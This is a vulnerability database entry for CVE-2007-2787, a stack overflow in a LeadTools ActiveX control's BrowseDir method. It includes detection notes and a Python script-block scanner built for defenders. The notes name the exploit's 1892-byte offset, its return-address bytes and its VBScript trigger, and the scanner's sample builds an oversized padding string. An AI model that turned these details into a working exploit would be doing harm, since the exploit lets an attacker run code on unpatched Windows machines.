cbcvebase.
CVE-2007-2787
published 2007-05-21


Priority: P340 · high · 7.5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 7.50% (93.7th percentile)
Stack-based buffer overflow in the BrowseDir function in the (1) lttmb14E.ocx or (2) LTRTM14e.DLL ActiveX control in LeadTools Raster Thumbnail Object Library 14.5.0.44 allows remote attackers to execute arbitrary code via a long argument.

Affected

1 ranges
Vendor | Product | Version range | Fixed in
lead_technologies | leadtools_raster_thumbnail_object_library | |

Detection & IOCs (extracted from sources)

filename: lttmb14E.ocx
filename: LTRTM14e.DLL
command: test.BrowseDir egg
bytes: %EB%AA%3F%7E
  • The vulnerable method is BrowseDir on the ActiveX controls lttmb14E.ocx and LTRTM14e.DLL; monitor for invocation of BrowseDir with arguments exceeding 1892 bytes, which triggers the stack-based buffer overflow.
  • The exploit uses a 1892-byte 'A' padding buffer followed by the EIP overwrite value %EB%AA%3F%7E (call ESP gadget from user32.dll); detect large string arguments to BrowseDir in browser/script contexts.
  • The exploit is delivered via a VBScript Sub invoking the ActiveX BrowseDir method with a crafted oversized egg string; look for script blocks calling .BrowseDir with large string concatenations in HTML/HTA files.
  • The exploit targets Windows XP SP2 with Internet Explorer 7; the ActiveX controls lttmb14E.ocx and LTRTM14e.DLL should be flagged as kill-bit candidates and their presence on systems audited.
  • The EIP overwrite gadget (%EB%AA%3F%7E, 'call ESP') is sourced from user32.dll and is version/OS-specific; the offset of 1892 bytes and this gadget address apply specifically to Windows XP SP2 with the tested DLL version 14.5.0.44.
  • Both exploits (lttmb14E.ocx and LTRTM14e.DLL) use identical shellcode and buffer layout, indicating the same vulnerability surface and offset apply to both ActiveX controls at version 14.5.0.44.
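
The script-block check described in the detection notes above, as an added example that is not part of the original page or its sources. The function names, the regex heuristics and both sample pages are constructed for illustration; only the 1892-byte threshold and the BrowseDir method name come from the page.

```python
import re

OFFSET = 1892  # padding length the page reports for version 14.5.0.44

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
CALL_RE = re.compile(r"\.BrowseDir\b", re.I)
LITERAL_RE = re.compile(r'"((?:[^"\r\n]|"")*)"')             # VBScript string literal
REPEAT_RE = re.compile(r"\bString\s*\(\s*(\d+)\s*,", re.I)   # String(n, "A") padding
ENCODED_RE = re.compile(r"(?:%[0-9a-f]{2}){16,}", re.I)      # long unescape() input


def scan_script(body, threshold=OFFSET):
    """Return the reasons a script block looks like an oversized BrowseDir call."""
    if not CALL_RE.search(body):
        return []
    reasons = []
    longest = max((len(m.group(1)) for m in LITERAL_RE.finditer(body)), default=0)
    if longest >= threshold:
        reasons.append(f"string literal of {longest} chars")
    for m in REPEAT_RE.finditer(body):
        if int(m.group(1)) >= threshold:
            reasons.append(f"String({m.group(1)}, ...) padding")
    if ENCODED_RE.search(body):
        reasons.append("long percent-encoded byte run")
    return reasons


def scan_html(text, threshold=OFFSET):
    """Scan every <script> block of an HTML/HTA file; return (index, reasons) hits."""
    hits = []
    for i, m in enumerate(SCRIPT_RE.finditer(text)):
        reasons = scan_script(m.group(1), threshold)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed samples: a normal directory browse and an oversized argument.
BENIGN = '<script language="vbscript">\nthumbs.BrowseDir "C:\\Images"\n</script>'
SUSPECT = ('<script language="vbscript">\negg = String(2000, "A")\n'
           'test.BrowseDir egg\n</script>')

if __name__ == "__main__":
    for name, page in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_html(page))
```

The match is a static heuristic: an argument assembled in a loop or fetched at run time will not be sized by it, so treat a hit as a triage signal alongside the kill-bit and file-presence audit.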